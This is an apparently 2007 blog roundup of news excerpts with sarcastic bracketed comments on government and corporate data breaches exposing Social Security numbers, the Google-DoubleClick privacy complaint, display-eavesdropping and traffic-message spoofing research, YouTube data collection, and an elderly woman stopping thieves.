Today's theme seems to be “Trust us! We're your government!”
Ignorance is bliss. That's a “law” that needs changing.
U.S. Exposed Personal Data
Census Bureau Posted 63,000 Social Security Numbers Online
By Ellen Nakashima Washington Post Staff Writer Saturday, April 21, 2007; A05
For more than a decade, the Census Bureau posted on a public Web site the Social Security numbers of 63,000 people who received financial aid, officials said yesterday. The apparent violation of federal privacy law prompted concerns about identity theft.
Government officials removed the data from the Web site on April 13, the day they were alerted to the breach by an Illinois farmer [“We're the Census Bureau, we don't know what's on our website!” Bob] who discovered the numbers while surfing the Internet. They did not publicize the matter until yesterday, saying they needed the delay to enable information-security officials to contact those whose numbers were revealed and to contact "at least a half-dozen" mirror sites.
"We take full responsibility for this and offer no excuses for it," said Terri Teuber, a spokeswoman for the U.S. Department of Agriculture. "We absolutely do not think it was appropriate."
A watchdog group countered that officials tried to suppress the news.
"The bottom line is the government screwed up," said Gary Bass, executive director of OMB Watch. "What's really important is that they now try to rectify the problem. Thousands of research groups have copies of this site."
... Teuber said the USDA had been using Social Security numbers as part of a 15-digit federal contract identifier number. The practice dates back more than 25 years, she said, to when Social Security numbers were printed on checks. She said the USDA's information-security division was not aware of this continuing practice until last week. [First: Take an inventory! Bob]
Ignorance is commonplace...
Los Alamos warns workers about identity theft
Personal data of NMSU students posted online
By SUE MAJOR HOLMES Associated Press April 20, 2007
ALBUQUERQUE, N.M. (AP) _ Los Alamos National Laboratory warned employees about protecting themselves against identity theft after the names and Social Security numbers of 550 lab workers were posted on a Web site run by a subcontractor working on a security system.
An April 5 letter to the employees from Jan A. Van Prooyen, the lab's acting deputy director, said the problem was discovered the previous week when a lab employee happened upon the Web site [Apparently, managers are genetically incapable of finding problems. Bob] of a software services company that had been hired years before.
Clicking a link and entering a password provided online [Now there's a “security technique” you seldom see... Bob] led to a table that included names, and in some cases, Social Security numbers, of people who entered certain lab sites around 1998, the letter said.
Van Prooyen said the lab wasn't aware of "this unauthorized use" of personal information until March 28, and that the former subcontractor removed the information that afternoon after the lab contacted the company.
... Van Prooyen's letter said the lab did not know how long the information had been online. [What records? Bob] However, it said the information wasn't likely to have been misused given that it was buried within the Web site, the site did not appear to have been widely accessed and the subcontractor's business had not been active for about two years.
Ignorance is widespread. (Somehow it looks more impressive when you summarize the whole week in one article...)
Data “Dysprotection:” Friday Roundup
Friday April 20th 2007, 6:52 pm
A quick recap of some of the breaches and follow-ups we reported in the news section this week:
At least 60 customers of Albertson’s Supermarket in San Lorenzo had their identities stolen and bank accounts raided by thieves who used a credit card skimmer. By the end of the week, authorities reported that another Albertson’s had also been compromised the same way.
The University of Pittsburgh Medical Center disclosed that a second set of patient data containing patient names, Social Security numbers, X-rays and other personal medical information had been found on UPMC’s web site and in the Internet Archives. This was in addition to the 80 patients previously reported to have been found on both the web and in the Internet Archives. Not a great week for UPMC.
When the Washington Post exposed the fact that student loan companies were improperly accessing a national database with confidential information on tens of millions of students, the lenders were blocked from access.
New Horizons Community Credit Union (NHCCU) is notifying members of a potential breach of confidential member loan information after the theft of a laptop computer from Protiviti, “a consultant employed by Bellco Credit Union conducting due diligence [but having none themselves... Bob] to prepare a possible acquisition bid.” Anybody else see any irony in the firm doing due diligence managing to get their laptop stolen or am I just in a weird mood?
Ohio State University reported a “two-fer” on breaches this week: a hack compromised the personal information of 14,000 current and former faculty and staff members. Additionally, two laptop computers stolen from a professor’s home contained the SSN and grades of about 3500 chemistry students. And in case one set of the data wasn’t enough, the professor had just finished copying over all of the data from one laptop to the other.
A Los Angeles County laptop computer that contained names and SSN of 28 people enrolled in the Department of Social Services’ Refugee Employment Program was stolen.
An employee of Gerald Champion Regional Medical Center was found to be in possession of confidential employee information, including SSN and bank account information, even though he was not authorized to have that information. Hey, at least they know where their data are, unlike some of these other folks…
The Texas Attorney General filed suit against CVS/Caremark Corp. for putting as many as 1000 customers’ records in a dumpster behind one of its stores. This was the second such suit as the AG also filed against Radio Shack recently.
A man who stole hundreds of identities from patients whose accounts were handled by Hospital Billing & Collection Service Inc. was sentenced to six years and three months in prison today.
A man in prison for identity theft is accused of running a similar operation from behind bars. Gimme that good old-fashioned American ingenuity…
A computer file server containing research subject information, SSN, and medical details on 3000 cancer research participants was stolen from the University of California at San Francisco.
Valve Software, the company behind Counter Strike and Half Life, has been accused of covering up a hack of its servers which allegedly exposed the credit card details of thousands of its customers.
The names and SSN of more than 5,600 New Mexico State University students were accidentally posted on the school’s Web site for a few hours.
Los Alamos National Laboratory was back in the news this week: 550 lab employees were notified that their names and in some cases, SSN, had been on a web site for what appears to be at least two years.
The SSN of up to 150,000 people who received loans or other financial assistance from two Agriculture Department programs were disclosed for 26 years in a publicly available database. Officials at the Agriculture Department and the Census Bureau, which maintains the database, were notified last week by a farmer from Illinois, who stumbled across the database on the Internet.
Major mail-order Japanese retailer Japanet Takata Co. has filed a 110 million yen damages suit against a former employee who allegedly copied personal information on over half a million customers and then leaked it to outsiders.
In the UK, Lime Pictures exposed about 20,000 individuals’ personal details on its website in the form of completed job applications.
Also in the UK, about 100,000 customers of the broadband provider Bulldog appear to have had private details stolen.
But on a positive note:
Not one agency or business reporting a breach suggested that there was any chance that the information had been or even might be misused. (Note that I am struggling valiantly to type this with a straight face…)
Although the U.S. Dept. of Commerce reported that 33 computers were infected with data-stealing Trojans and other malware last year, no information is believed to have been stolen. Gotta stop opening those porn links at work, guys…
When does stupidity cross into gross negligence? Who should be talking to these people?
ISP Kicks Out User Who Exposed Vulnerability; Doesn't Fix Vulnerability
from the blame-the-messenger dept
Over the past few years, there have been plenty of examples of companies with security vulnerabilities blaming the messenger when the vulnerabilities are pointed out, often threatening them with time in jail. The end result, of course, is that many security researchers are afraid to report vulnerabilities, as they may be blamed for them. Of course, that doesn't mean that others haven't found the same vulnerabilities and started using them for malicious purposes. The latest such case is pointed out by Broadband Reports and involves an ISP in the UK called BeThere. Apparently, a college student discovered and published a pretty major vulnerability found in the routers the company uses, allowing anyone to access the routers remotely. Rather than thank the customer for finding and highlighting a pretty serious vulnerability, the company has cut off his service and threatened him with lawsuits. Oh yeah, they also haven't bothered to fix the vulnerability -- despite it being published 7 weeks ago. The reasoning from the ISP is astounding. They claim that since they can't find any evidence that anyone ever used the vulnerability, he must have discovered it by "illegal" means. Who knew that simply probing for security vulnerabilities was illegal? And, of course, the ISP told the guy he's not allowed to talk about its legal threat to him -- which isn't actually legally binding. It's not clear if the ISP doesn't understand what it's done or simply doesn't want to fix the vulnerability -- but the fact that it seems to think it's ok to leave the vulnerability there and just cut off the guy who pointed it out should make other customers of BeThere wonder about how the ISP treats their security.
While we're on the subject of ill-logic... Is this a case of: “We shoulda thought of this first?”
Google-DoubleClick Raise Red Privacy Flags
By Roy Mark April 20, 2007
UPDATED: Online privacy groups filed a complaint with the Federal Trade Commission (FTC) today seeking to block Google's $3.1 billion bid for online advertising firm DoubleClick unless the world's largest search engine agrees to greater consumer privacy protections.
The combination of Google (Quote) and DoubleClick would combine two of the biggest players in online advertising. Google's AdSense business is algorithm-driven and based on clickable links, while DoubleClick's DART technology places targeted banners on popular online sites.
The complaint alleges if the deal is allowed to go unchecked, Google will have the unprecedented ability to "record, analyze, track and profile" the activities of Internet users, [Surely, they can do that now? Bob] a charge both Google and DoubleClick were quick to deny.
"Google's proposed acquisition of DoubleClick will give one company access to more information about the Internet activities of consumers than any other company in the world," [Surely, one company is number one today... Bob] the complaint states. "Moreover, Google will operate with virtually no legal obligation to ensure the privacy, security and accuracy of the personal data that it collects." [but not because of this merger... Bob]
The groups also complain that at least some the data is personally identifiable.
But DoubleClick insisted in a statement, "Any and all information collected by DoubleClick is, and will remain, the property of the company's clients. Ownership rights, like the other terms of DoubleClick's client contracts, will be unaffected by any acquisition."
The privately held DoubleClick added, "Google would not be able to match its search data to the data collected by DoubleClick, as DoubleClick does not have the right to use its clients' data for such purposes." [This is based on the Privacy statement, not a technical barrier. Changing the Privacy statement is as simple as uploading a new page. Bob]
Nicole Wong, Google's deputy general counsel, issued a statement calling the complaint "unsupported by the facts and the law." Wong said the complaint "utterly fails to identify any practice that does not comply with accepted privacy standards."
The Electronic Privacy Information Center (EPIC), the Center for Democracy and Technology (CDT) and the U.S. Public Interest Research Group (U.S. PIRG) want DoubleClick to remove user-identified cookies and "other persistent pseudonymic" identifiers from all corporate records and databases prior to any transfer to Google.
The groups also want the FTC to require Google to publicly present a plan to comply with government and industry privacy standards as a condition of the deal. [Most interesting! Who does that now? Bob] In addition, they are seeking to force Google to establish a meaningful data destruction policy and offer consumers "reasonable access" to all personally identifiable data held by the company.
According to the complaint, "Absent injunctive relief [by the FTC]…other companies will be encouraged to collect large volumes of information from consumers in an unfair, disproportionate and deceptive manner." [How? Bob]
When the deal was announced late last week, DoubleClick CEO David Rosenblatt said, "Google is the absolute perfect partner for us. Combining DoubleClick's cutting edge digital solutions for both media buyers and sellers with Google's scale and …resources will bring tremendous value to both our employees and clients."
Google co-founder Sergey Brin added, "Together with DoubleClick, Google will make the Internet more efficient for end users, advertisers and publishers."
The market was unimpressed with the privacy groups' FTC complaint. In late afternoon trading, Google shares were up almost $15 to $486.70.
If the deal is approved, it will close by the end of the year.
Tools & Techniques Not new, but an interesting question: Is it 'wiretapping' when you a 'broadcasting?'
Friday, April 20, 2007
Seeing through walls
Have you considered that someone could be reading what's on your monitor from a few rooms away? It's unlikely, but possible, as work by Cambridge University computer security researcher Markus Kuhn shows.
A radio antenna and radio receiver - equipment totalling less than £1000 - is all you need. Kuhn managed to grab the image to the left through two intermediate offices and three plasterboard walls.
Back in 1985, Wim Van Eck proved it was possible to tune into the radio emissions produced by electromagentic coils in a CRT display and then reconstruct the image. The practice became known as Van Eck Phreaking
... CRTs are now well on the way to being history. But Kuhn has shown that eavesdropping is possible on flat panel displays too.
... Kuhn also mentioned that one laptop was vulnerable because it had metal hinges that carried the signal of the display cable. I asked if you could alter a device to make it easier to spy on. "There are a lot of innocuous modifications you can make to maximise the chance of getting a good signal," he told me. For example, adding small pieces of wire or cable to a display could make a big difference.
... For another cool security demonstration by Kuhn, check out this story on decoding the flicker a monitor casts on the walls.
How to steer customers to your storefront... (screw up 'first responders, etc.)
Don't let your navigation system fool you
By Joris Evers Story last modified Fri Apr 20 15:46:46 PDT 2007
VANCOUVER, B.C.--That roadblock alert on your navigation system may not be real. Neither may that warning for a "terrorist incident," an "air raid" or a "bullfight."
Two Italian hackers have figured out how to send fake traffic information to navigation systems that use a data feature of FM radio for real-time traffic information. Using cheap, off-the-shelf hardware, they can broadcast traffic data that will be picked up by cars in about a one-mile radius, the hackers said during a presentation at the CanSecWest event here.
"We can create queues, bad weather, full car parks, overcrowded service areas, accidents, roadwork and so on," Andrea Barisani, chief security engineer at Inverse Path, a security company. "Traffic information displayed on satellite navigation systems is trusted by drivers. Normal people do not think that you can do nasty things."
Barisani and hardware hacker Daniele Bianco discovered that the system used by many navigation aides to get traffic data isn't secured. [Planning! Bob] The data is sent using the Traffic Message Channel (TMC) of the Radio Data System (RDS), a standard way of transmitting data over FM radio also used to display station names and program titles.
... The hackers wrote a program to decode the RDS data. "As far as we know it is the first open-source tool that tries to fully decode RDS information," Barisani said. They then figured out how to create their own TMC messages and broadcast those using an RDS encoder, an FM transmitter, an antenna and some other tools.
Perhaps we are becoming (or always were) a nation of voyeurs?
Analyst: Web 2.0 Users Would Rather Watch Than Upload
By John P. Mello Jr. TechNewsWorld 04/20/07 8:00 AM PT
New findings by Hitwise suggest the great majority of Web 2.0 users are the online equivalent of couch potatoes. Among visitors to sites that encourage active participation from users in the form of editing or uploading content, only a tiny fraction of visitors typically do so -- most are just observers.
The so-called "New Web" has been hailed as a great place for sharing and interacting, but data released Tuesday by Internet traffic researchers suggests most cybersurfers are watchers, not uploaders.
In a presentation at the Web 2.0 Expo in San Francisco this week, Hitwise analyst Bill Tancer noted that upload rates at participatory cyberstops like YouTube and Flickr were well under 1 percent -- 0.16 percent for video-sharing site YouTube and 0.2 percent for photo-sharing site Flickr, which is owned by Yahoo.
The Hitwise findings beg the question, is the Web moving the realm of the couch potato from the living room into Cyberspace?
"Web 2.0 is to the Internet what the remote was to TV," Jaron Lanier a scholar-in-residence at the University of California at Berkeley and a pioneer in virtual reality research, told TechNewsWorld. "It encourages skittish attention deficit behavior."
80 Percent Watchers
By and large, most visitors to participatory Web sites are watchers, maintained Randall C. Bennett, former lead blogger for DV Guru and founder of Tech Check Daily, a daily video podcast about technology.
As a rule of thumb, he estimated that about 1 percent of a site's visitors are "creatives" -- enthusiastic and frequent uploaders of site content; some 20 percent are "contributors" who might do some uploading and add comments and tags to a site's content; and the rest of the visitors are just watchers.
"They're the kind of people who use Wikipedia just because the information is useful to them," he exemplified.
Ironically, Wikipedia, the online encyclopedia written and edited by volunteers, had a relatively high participation rate in the Hitwise findings -- 4.49 percent of visitors edited entries at the site.
"I'm not surprised that the percentage of people who upload videos is much smaller than the percentage of people who watch them," John Battelle, a Web marketing analyst with Battelle Media told TechNewsWorld.
"But I don't think the act of watching on the Web is necessarily passive," he added. "You're watching a conversation, which is different than watching a presentation."
For example, he explained that many visitors to a video-sharing Web site aren't just looking at a video. They're looking at related videos, responses to video, commentary on videos and so forth.
"It's a conversational dynamic as opposed to a receiving dynamic," he observed.
That conversational dynamic inherent in Web 2.0 appears even at sites that limit user uploads.
Jeffrey D. Neuburger, chairman of the technology, media and communication department at the law firm of Thelen Reid Brown Raysman & Steiner, cited a major record company that has moved all its talent acquisition operations to the Web.
"It's like American Idol," he told TechNewsWorld. "Artists upload their music and videos, but the public can post comments on them so the A&R (artist and repertoire) people can actually get a sense of what the public thinks about the content before they approach an artist."
Even if participation rates at Web 2.0 sites remain low, visitors continue to flock to the cyberstops, according to Hitwise. Its presentation showed that in the last two years, visits to the top participatory Web sites increased 668 percent.
Other findings in the Hitwise presentation included:
Visits to Wikipedia outnumber visits to Microsoft's Encarta encyclopedia site 3,400 to 1.
Biggest users of Wikipedia are 18- to 24-year-olds (25.89 percent) and 35- to 44-year-olds (25.53 percent), while most of the editing of the encyclopedia is being done by 35- to 44-year-olds (27.35 percent), 45- to 54-year-olds (28.85 percent) and the over-55 set (25.59 percent).
Web 2.0 photo sites account for 56 percent of all photo site traffic on the Internet.
Most YouTube visitors are 18- to 24-year-olds (30.55 percent), while most video is uploaded to the site by 35- to 44-year-olds (35.65 percent).
So who watches the watchers?
YouTube to collect user data
Posted by Greg Sandoval April 20, 2007 11:16 AM PDT
YouTube, the Internet's No. 1 video warehouse, is gearing up to collect user data that could prove valuable to marketers, according to the company's chief marketing officer.
Suzie Reider, YouTube's chief marketing officer, told an audience at the Advertising Research Foundation's Rethink conference this week that YouTube will launch in a few weeks its first user study, according to trade publication Advertising Age.
"By Q3, we'll have a tremendous amount of metrics and data around every video," Reider told the audience. "There's lots you can glean from looking at who's looking at what. ["You can observe a lot just by watchin'." Yogi Berra Bob] It's a real-time focus group that happens all day, every day."
More than 34 million U.S. residents visit YouTube each month, according to ComScore Networks.
Good on ya', Annie Oakly! (In the old days, women were TUFF!)
One tough beauty queen
Venus Ramey, 82, shoots tire, stops intruders
BY KIMBALL PERRY KPERRY@ENQUIRER.COM
Venus Ramey has earned lots of fame in her 82 years.
She was Miss America 1944 and later a candidate for Cincinnati City Council and worked to save Over-the-Rhine's historic buildings. She performed on Broadway and in movies.
Now, though, she's in the news for another reason.
After confronting a man she said was stealing from her Kentucky farm, Ramey pulled out a gun and shot out a tire on his truck so he couldn't leave, allowing police to arrest him and two others.
"He was probably wetting his pants," Ramey said Thursday from her home in Waynesburg, about 140 miles south of Cincinnati.
Ramey was on her Lincoln County farm last week - "Friday the 13th, apropos date, isn't it?" she noted Thursday - feeding a horse when she saw her dog run to a nearby building where she stores old steel-shaping machines, lathes and other equipment.
"This stuff is over 100 years old," she said.
For some time, thieves had been breaking into the building to steal the machines to sell for scrap. She hadn't been able to catch anyone in the act until last week.
She drove over to the building and blocked the truck sitting there.
When she asked a man what he was doing, he replied "scrapping," and said he would leave.
"I said, 'Oh, no you won't,' and I shot their tires so they couldn't leave," Ramey said.
She had to balance on her walking stick as she pulled out a snub-nosed .38-caliber handgun.
"I didn't even think twice. I just went and did it. If they'd even dared come close to me, they'd be 6 feet under by now."
Ramey then tried to flag down people driving by. When one stopped, she asked them to call 911. Eventually, three people were arrested - one at the scene and two others walking on a nearby road.
"They've been stealing from me for years. Those good-for-nothing slobs," she said.